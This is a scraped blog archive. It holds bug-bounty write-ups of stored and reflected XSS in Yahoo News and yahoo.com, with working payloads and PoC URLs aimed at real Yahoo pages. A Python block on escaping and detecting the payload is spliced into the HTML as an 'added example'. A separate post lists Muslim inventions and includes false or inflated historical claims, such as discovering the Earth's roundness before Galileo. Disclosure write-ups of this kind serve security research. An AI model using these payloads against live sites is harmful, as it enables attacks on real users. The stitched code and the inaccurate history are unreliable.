Go to:</span></b><span style="font-family: courier; font-size: medium;"><span color="rgba(0, 0, 0, 0.84)"> </span><a class="markup--anchor markup--p-anchor" data-href="https://www.yahoo.com/news" href="https://www.yahoo.com/news" rel="nofollow noopener" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: linear-gradient(rgba(0, 0, 0, 0.68) 50%, rgba(0, 0, 0, 0) 50%); background-position: 0px 1.07em; background-repeat: repeat-x; background-size: 2px 0.1em; text-decoration-line: none;" target="_blank"><span style="color: #2b00fe;">https://www.yahoo.com/news</span></a></span></div>
</div>
<div class="graf graf--p graf-after--h3" id="b442" name="b442" style="background-color: white; line-height: 1.58; margin-top: 8px;">
<div style="text-align: left;">
<div style="color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;"><span style="letter-spacing: -0.063px;"><b><span style="font-family: courier; font-size: medium;">Comment this Payload:</span></b><span style="font-family: courier; font-size: medium;"><pre><code>&quot;&gt;&lt;img src=x onerror=confirm(1);&gt;</code></pre></span></span></div>
<div style="color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<span style="font-family: , "georgia" , "cambria" , "times new roman" , "times" , serif; letter-spacing: -0.063px;"><br /></span></div>
<div class="separator" style="clear: both; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6BuiDYVCWKySPhsRKLnaKYDPAUsvGCBGHCKcFdWww2hDSqksPn1NKfX-hjZdMHsIeyiX3aJVzp1uPcBR1o2NQm-mQDofuycoPTyEvoHGLFFA2dcnE7fDScKo0_H9tT08DHIruC_Z4hIo/s1600/yahoo+news.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="876" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6BuiDYVCWKySPhsRKLnaKYDPAUsvGCBGHCKcFdWww2hDSqksPn1NKfX-hjZdMHsIeyiX3aJVzp1uPcBR1o2NQm-mQDofuycoPTyEvoHGLFFA2dcnE7fDScKo0_H9tT08DHIruC_Z4hIo/s1600/yahoo+news.png" /></a></div>
<div style="color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<span style="font-family: , "georgia" , "cambria" , "times new roman" , "times" , serif; letter-spacing: -0.063px;"><br /></span></div>
<div style="color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<span style="font-family: , "georgia" , "cambria" , "times new roman" , "times" , serif; letter-spacing: -0.063px;"><br /></span></div>
<div style="color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<span style="letter-spacing: -0.063px;"><span style="font-family: courier; font-size: medium; letter-spacing: -0.063px;">Now what? Voila! We get the famous confirm(1) popup! :D</span></span></div>
<div class="separator" style="clear: both; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI_3sYSyIr1NStS2BdxhPDgaGmof7yYhFsSfCHRGoLLEqhWppaTyCflFfhAh2vJpPtvNbT2HzzB-5QOzBVccwVx2Jthn1PPTzTwB5uRI9qwImZhZkACMcV2lYoeIGmqqygN9D-sujZjtY/s1600/Yahoo+XSS.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="274" data-original-width="1004" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI_3sYSyIr1NStS2BdxhPDgaGmof7yYhFsSfCHRGoLLEqhWppaTyCflFfhAh2vJpPtvNbT2HzzB-5QOzBVccwVx2Jthn1PPTzTwB5uRI9qwImZhZkACMcV2lYoeIGmqqygN9D-sujZjtY/s1600/Yahoo+XSS.png" /></a></div>
<div style="color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<br /></div>
<div style="color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em;">
</div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><span style="letter-spacing: -0.063px;">I tried another payload so that I could write something in the popup box, and found this one: </span><code class="markup--code markup--p-code" style="background: rgba(0, 0, 0, 0.05); letter-spacing: -0.063px; margin: 0px 2px; padding: 3px 4px;"><span style="font-family: courier;"><pre><code>&lt;img src=x onerror=prompt(1337)&gt;</code></pre></span></code></span></div>
<span style="font-family: , "georgia" , "cambria" , "times new roman" , "times" , serif; font-size: 21px; letter-spacing: -0.063px;"></span><br />
<div style="text-align: center;">
<span style="letter-spacing: -0.063px;"><span style="font-family: courier; font-size: medium; letter-spacing: -0.063px;"> At that moment I felt like a boss! :P</span></span></div>
<span style="font-family: , "georgia" , "cambria" , "times new roman" , "times" , serif; font-size: 21px; letter-spacing: -0.063px;"> </span><br />
<div class="separator" style="clear: both; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOroTr_EV4vPGYf_F7__U4Tl6aiJaZVYvcaTKlUllo0GszXO4vUuIdqSiL7xT2GTlzNxQwL6k988n86UkLP4Uvyye6tPBqNCHub2sTbyKIm_u3DV_q_nd97tkhAllnAPoYYj_yvRR-M6Y/s1600/LIKE+A+BOSS.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="600" data-original-width="1200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOroTr_EV4vPGYf_F7__U4Tl6aiJaZVYvcaTKlUllo0GszXO4vUuIdqSiL7xT2GTlzNxQwL6k988n86UkLP4Uvyye6tPBqNCHub2sTbyKIm_u3DV_q_nd97tkhAllnAPoYYj_yvRR-M6Y/s1600/LIKE+A+BOSS.jpg" /></a></div>
<div style="color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsZDvc0US4S8whAt745P_jTQB14-HmKxZGw8ANlMaUUQ-wd62I-1RcFF2amnwgqWMtIP1ikSmy2diTaZw_-6eTWYe8RfkIPqM7tmXHAJbMCaQrWO7sJ4ef33efLq-fvdTu0yx6LUnU_ew/s1600/Yahoo+stored+xss.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="382" data-original-width="1044" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsZDvc0US4S8whAt745P_jTQB14-HmKxZGw8ANlMaUUQ-wd62I-1RcFF2amnwgqWMtIP1ikSmy2diTaZw_-6eTWYe8RfkIPqM7tmXHAJbMCaQrWO7sJ4ef33efLq-fvdTu0yx6LUnU_ew/s1600/Yahoo+stored+xss.png" /></a></div>
<div style="color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<br /></div>
<div style="color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<br /></div>
<div style="color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<span style="font-family: courier; font-size: medium; letter-spacing: -0.063px;"><b>Here is the video PoC:</b></span></div>
<div style="color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<span style="font-family: , "georgia" , "cambria" , "times new roman" , "times" , serif; letter-spacing: -0.063px;"><b><br /></b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/3OAvt8HucN4/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/3OAvt8HucN4?feature=player_embedded" width="320"></iframe></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h4 class="graf graf--h4 graf-after--figure" id="53ee" name="53ee" style="--baseline-multiplier: 0.22; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.012em; line-height: 1.22; margin: 39px 0px 0px -1.63px;"><span style="font-family: courier;">
Timeline:</span></h4>
<div class="graf graf--p graf-after--h4" id="73da" name="73da" style="--baseline-multiplier: 0.17; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; line-height: 1.58; margin-top: 6px;"><span style="font-family: courier; font-size: medium;">
31/03/2018 - Initial Report.</span></div><div class="graf graf--p graf-after--h4" id="73da" name="73da" style="--baseline-multiplier: 0.17; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; line-height: 1.58; margin-top: 6px;"><span style="font-family: courier; font-size: medium; letter-spacing: -0.003em;">01/04/2018 - HackerOne staff requested more info (Needs more info).</span></div><div class="graf graf--p graf-after--h4" id="73da" name="73da" style="--baseline-multiplier: 0.17; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; line-height: 1.58; margin-top: 6px;"><span style="font-family: courier; font-size: medium; letter-spacing: -0.003em;">01/04/2018 - More Info Submitted.</span></div><div class="graf graf--p graf-after--h4" id="73da" name="73da" style="--baseline-multiplier: 0.17; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; line-height: 1.58; margin-top: 6px;"><span style="font-family: courier; font-size: medium; letter-spacing: -0.003em;">04/04/2018 - Triaged and a $300 initial bounty rewarded.</span></div><div class="graf graf--p graf-after--h4" id="73da" name="73da" style="--baseline-multiplier: 0.17; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; line-height: 1.58; margin-top: 6px;"><span style="font-family: courier; font-size: medium; letter-spacing: -0.003em;">06/04/2018 - Bug Resolved.</span></div><div class="graf graf--p graf-after--h4" id="73da" name="73da" style="--baseline-multiplier: 0.17; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; line-height: 1.58; margin-top: 6px;"><span style="font-family: courier; font-size: medium; letter-spacing: -0.003em;">11/04/2018 - Another $1700 bounty rewarded. (Total $2000)</span></div>
<div class="separator" style="clear: both; text-align: center;"><br /></div>
</div>
</div>
</div>
</div>
TheShahzadahttp://www.blogger.com/profile/01405567763403009941noreply@blogger.com0tag:blogger.com,1999:blog-1395592345970778383.post-65732051716334399372017-08-31T01:28:00.007+06:002023-10-06T22:36:55.185+06:00Reflected XSS in yahoo.com<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;">
Hello Guys, This is <b>Shahzada Al Shahriar Khan</b>.</span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;">
I am from <b>Bangladesh</b>, and I am a newbie in bug bounty. :P</span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;">
Well, now I will share how I found Reflected Cross-Site Scripting (XSS) in the main domain and a subdomain of <b>Yahoo.</b></span></div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><br /></span></div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><span face=", , "segoe ui" , "roboto" , "oxygen" , "ubuntu" , "cantarell" , "open sans" , "helvetica neue" , sans-serif" style="background-color: white; border: 0px; box-sizing: border-box; font-stretch: inherit; font-weight: 600; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Vulnerable URLs:</span><br /><span style="background-color: white;"><pre><code>https://www.yahoo.com/movies/film/[*]</code></pre></span><span style="background-color: white;"><pre><code>https://ca.yahoo.com/movies/film/[*]</code></pre></span>
<span style="background-color: white;"><br /></span></span></div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><span face=", , "segoe ui" , "roboto" , "oxygen" , "ubuntu" , "cantarell" , "open sans" , "helvetica neue" , sans-serif" style="background-color: white; border: 0px; box-sizing: border-box; font-stretch: inherit; font-weight: 600; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Payload:</span><br />
<span style="background-color: white; border: 0px; box-sizing: border-box; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin: 0px; padding: 0px; text-align: start; vertical-align: baseline;"><span face=", , "segoe ui" , "roboto" , "oxygen" , "ubuntu" , "cantarell" , "open sans" , "helvetica neue" , sans-serif"><pre><code>"><%2fscript><script>alert(document.domain)<%2fscript></code></pre></span></span></span></div>
<div style="text-align: center;">
<span style="background-color: white; text-align: start;"><span style="font-family: courier; font-size: medium;"><br /></span></span></div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><span face=", , "segoe ui" , "roboto" , "oxygen" , "ubuntu" , "cantarell" , "open sans" , "helvetica neue" , sans-serif" style="background-color: white; border: 0px; box-sizing: border-box; font-stretch: inherit; font-weight: 600; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">PoC URL:</span><br /><span face=", , "segoe ui" , "roboto" , "oxygen" , "ubuntu" , "cantarell" , "open sans" , "helvetica neue" , sans-serif" style="background-color: white; border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><pre><code>https://www.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript></code></pre></span><span face=", , "segoe ui" , "roboto" , "oxygen" , "ubuntu" , "cantarell" , "open sans" , "helvetica neue" , sans-serif" style="background-color: white; border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><pre><code>https://ca.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript></code></pre></span><span face=", , "segoe ui" , "roboto" , "oxygen" , "ubuntu" , "cantarell" , "open sans" , "helvetica neue" , sans-serif" style="background-color: white; border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><br /></span></span></div>
<div style="text-align: center;">
<span style="background-color: white; border: 0px; box-sizing: border-box; font-family: courier; font-size: medium; font-stretch: inherit; font-weight: 600; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">PoC Screenshot:</span></div>
<div style="text-align: center;">
<span face=", , "segoe ui" , "roboto" , "oxygen" , "ubuntu" , "cantarell" , "open sans" , "helvetica neue" , sans-serif" style="background-color: white; border: 0px; box-sizing: border-box; font-size: 13px; font-stretch: inherit; font-weight: 600; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggSGGQsJcM-GmAiwDpwF43-tX7UsNUSrogzDKblZ-wtiJgy9Dn_BgSkZofM8ScevsjaUpmvBiA6VON18hVienMco8QAZpjbej7-56BQMVj4jLhcoWY48FtPiZNTgDnPfEVXEibEmBy2Rw/s1600/XSS1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="878" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggSGGQsJcM-GmAiwDpwF43-tX7UsNUSrogzDKblZ-wtiJgy9Dn_BgSkZofM8ScevsjaUpmvBiA6VON18hVienMco8QAZpjbej7-56BQMVj4jLhcoWY48FtPiZNTgDnPfEVXEibEmBy2Rw/s1600/XSS1.png" /></a></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinXynizfW34q4N1L3hg3mF0WQolNC1tOE44nsCNsDyu9WY7DCp0DtEna2kzzO2HUSMHipsi3DCw0UZg0qmMhOkwJdzPNIsJT3aVAgUQhbMQFa4Hcwd89Z7CyVmNp7Xu2pRpGly7mud7Bc/s1600/XSS2.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="895" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinXynizfW34q4N1L3hg3mF0WQolNC1tOE44nsCNsDyu9WY7DCp0DtEna2kzzO2HUSMHipsi3DCw0UZg0qmMhOkwJdzPNIsJT3aVAgUQhbMQFa4Hcwd89Z7CyVmNp7Xu2pRpGly7mud7Bc/s1600/XSS2.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: courier;">Yahoo Canada Subdomain</span></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="background-color: white; border: 0px; box-sizing: border-box; font-family: courier; font-size: medium; font-stretch: inherit; font-weight: 600; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Video PoC:</span><br />
<span face=", , "segoe ui" , "roboto" , "oxygen" , "ubuntu" , "cantarell" , "open sans" , "helvetica neue" , sans-serif"><span style="background-color: white; font-size: 13px; font-weight: 600;"><br /></span></span></div>
<iframe allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/QHRbzyIlpkc" width="560"></iframe>
<br />
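As an added example (not code from the original report), the Python below shows why the payload above works when a path segment is reflected unescaped into a double-quoted HTML attribute, how HTML-escaping the value neutralises it, and how the same probe shows up in access logs. The template, the log lines and the log regex are constructed assumptions for illustration, not Yahoo's actual markup or logs.

```python
import html
import re
from urllib.parse import unquote

# Constructed input: the path segment from this post's PoC URL, exactly as a browser sends it.
# Web servers decode %2f to "/" before the value reaches the page template.
POC_SEGMENT = '"><%2fscript><script>alert(document.domain)<%2fscript>'

# Hypothetical template that reflects the film name from the path into a double-quoted
# attribute (an assumption for illustration, not Yahoo's real markup).
TEMPLATE = '<a href="https://www.yahoo.com/movies/film/{film}">Film</a>'


def render_vulnerable(segment: str) -> str:
    """Reflect the decoded segment verbatim: the leading "> closes the attribute and the tag."""
    return TEMPLATE.format(film=unquote(segment))


def render_safe(segment: str) -> str:
    """Same template, but the value is HTML-escaped (quote=True also escapes the double quote)."""
    return TEMPLATE.format(film=html.escape(unquote(segment), quote=True))


SCRIPT_OPEN = re.compile(r"<script\b", re.IGNORECASE)


def script_tag_count(rendered: str) -> int:
    """Number of real <script> openers in the output; the template itself contains none."""
    return len(SCRIPT_OPEN.findall(rendered))


# Detection side: flag access-log requests whose decoded path contains HTML metacharacters,
# which is what a reflected-XSS probe against a path-based route looks like in logs.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
HTML_META = re.compile(r'[<>"\']')


def suspicious_requests(log_lines):
    """Return (ip, decoded_path) for lines whose path decodes to contain <, >, " or '."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        # Decode twice so that double-encoded probes (%253c) are caught as well.
        decoded = unquote(unquote(m.group("path")))
        if HTML_META.search(decoded):
            hits.append((m.group("ip"), decoded))
    return hits


# Constructed sample log lines (not taken from the original report).
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Aug/2017:10:00:01 +0600] "GET /movies/film/inception HTTP/1.1" 200',
    '203.0.113.9 - - [12/Aug/2017:10:00:02 +0600] "GET /movies/film/%22%3E%3C%2fscript%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E HTTP/1.1" 200',
    '203.0.113.9 - - [12/Aug/2017:10:00:03 +0600] "GET /movies/film/%253Cscript%253E HTTP/1.1" 200',
]
```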
<div style="text-align: center;">
<br /><div style="text-align: left;"><span style="background-color: white; font-family: courier; font-size: large; font-weight: 600;">Timeline:</span></div>
<span style="font-family: courier; font-size: medium;"><div style="text-align: left;">Aug 12th - I submitted the report.</div><div style="text-align: left;">Aug 15th - The report was triaged and I was rewarded a $300 initial bounty.</div><div style="text-align: left;">Aug 16th - Bug resolved.</div><div style="text-align: left;">Aug 24th - Another $400 bounty rewarded; the total bounty is $700.</div></span></div>
</div>
Imagine A World Without Muslims! (by TheShahzada, published 2016-02-17T15:19:00.031+06:00, updated 2021-02-24T16:13:21.796+06:00)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;"><b><span style="font-family: courier; font-size: x-large;"><br /></span></b></div><div style="text-align: center;"><b><span style="font-family: courier; font-size: x-large;">Imagine A World Without Muslims!</span></b></div><div style="text-align: center;">
<b><span style="font-family: courier; font-size: large;">Without Muslims you wouldn't have: </span></b></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Coffee </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Cameras </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Experimental Physics </b></span><b style="font-family: courier; font-size: large;"> </b></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Soap </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Shampoo </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Perfume/spirits </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Irrigation </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Crank-shaft, internal combustion engine, valves, pistons </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Combination locks - Architectural innovation (pointed arch -European Gothic cathedrals adopted this technique as it made the building much stronger, rose windows, dome buildings, round towers, etc.) </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Surgical instruments </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Anesthesia </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Windmill </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Treatment of Cowpox </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Fountain pen </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Numbering system </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Algebra/Trigonometry </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Modern Cryptology </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Crystal glasses </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Carpets </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Checks </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- University </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Optics </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Toothbrush </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Hospitals </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Bathing </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Quilting </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Mariner's Compass </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Soft drinks </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Pendulum </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Braille </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Cosmetics </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Surgery </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Calligraphy </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Manufacturing of paper and cloth... the list goes on.</b></span></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjov3U1PaUCa_P9c8PT5KCLiUWCzZFPWJL-4mVPucRsQKkwgQTsXhzPeajt5CCysGvFTgAyJcMsTY896GQpx8D2BKpO_wpMX0hnnrYZSk3ryyoLK9lrDo-Yt-dQ_qoGWgk055Z3Hfz8WNQ/s1600/imagine+a+world+without+muslim.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjov3U1PaUCa_P9c8PT5KCLiUWCzZFPWJL-4mVPucRsQKkwgQTsXhzPeajt5CCysGvFTgAyJcMsTY896GQpx8D2BKpO_wpMX0hnnrYZSk3ryyoLK9lrDo-Yt-dQ_qoGWgk055Z3Hfz8WNQ/s1600/imagine+a+world+without+muslim.jpg" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
It was a Muslim who realized that light ENTERS our eyes, unlike the Greeks who thought we EMITTED rays, and so invented the camera from this discovery.</b></span></div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><b><br /></b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
It was a Muslim who first tried to FLY in 852, even though it is the Wright Brothers who have taken the credit.</b></span></div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><b><br /></b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
It was a Muslim by the name of Jabir ibn Hayyan who was known as the founder of modern Chemistry. He transformed alchemy into chemistry. He invented: distillation, purification, oxidation, evaporation, and filtration. He also discovered sulfuric and nitric acid.</b></span></div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><b><br /></b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
It is a Muslim, by the name of Al-Jazari, who is known as the father of robotics.</b></span></div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><b><br /></b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
It was a Muslim who was the architect of Henry V's castle.</b></span></div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><b><br /></b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
It was a Muslim who invented hollow needles to suck cataracts from the eyes, a technique still used today.</b></span></div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><b><br /></b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
It was a Muslim who actually discovered inoculation to treat cowpox, not Jenner and Pasteur. The West just brought it over from Turkey.</b></span></div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><b><br /></b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
It was Muslims who contributed much to mathematics, like Algebra and Trigonometry, which was imported over to Europe 300 years later by Fibonacci and the rest.</b></span></div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><b><br /></b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
It was Muslims who discovered that the Earth was round 500 years before Galileo did.</b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
The list goes on and on....</b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
Just imagine a world without Muslims. Now I think you probably meant, JUST IMAGINE A WORLD WITHOUT TERRORISTS. And then I would agree, the world would definitely be a better place without those pieces of filth. But to hold a whole group responsible for the actions of a few is ignorant and racist. No one would ever expect Christians or White people to be held responsible for the acts of Timothy McVeigh (Oklahoma bombing) or Anders Breivik (Norway killing), or the gunman who shot Congresswoman Giffords in the head, wounded 12 and killed 6 people, and rightly so, because they had nothing to do with those incidents! Just like the rest of the 1.5 billion Muslims have nothing to do with this incident!<br />
<br /></b></span></div>
</div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
./collected</b></span></div><div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b><br /></b></span></div><div style="text-align: left;"><span style="font-family: courier;"><b>References:</b></span></div><div style="text-align: left;"><span style="font-family: courier; font-size: x-small;"><a href="https://www.youtube.com/watch?v=SxJ2OC7iXo0&ab_channel=1001Inventions">https://www.youtube.com/watch?v=SxJ2OC7iXo0&ab_channel=1001Inventions</a></span></div><div style="text-align: left;"><span style="font-size: x-small;"><a href="https://en.wikipedia.org/wiki/List_of_scientists_in_medieval_Islamic_world">https://en.wikipedia.org/wiki/List_of_scientists_in_medieval_Islamic_world</a></span></div>
</div>